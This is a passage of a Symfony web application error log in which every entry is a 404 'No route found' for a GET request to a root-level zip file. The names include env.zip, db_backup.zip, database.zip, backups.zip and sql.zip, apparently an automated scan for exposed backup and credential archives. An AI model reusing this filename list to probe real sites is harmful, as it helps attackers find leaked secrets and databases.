  3341. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3342. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3343. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3344. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3345. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3346. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3347. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3348. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3349. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3350. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3351. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3352. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3353. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3354. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3355. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3356. [2025-12-18 06:23:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3357. [2025-12-18 06:23:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3358. [2025-12-18 06:23:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3359. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3360. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3361. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3362. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3363. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3364. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3365. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3366. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3367. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3368. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3369. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3370. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3371. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3372. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3373. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3374. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3375. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3376. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3377. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3378. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3379. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3380. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3381. [2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3382. [2025-12-18 06:23:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3383. [2025-12-18 06:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
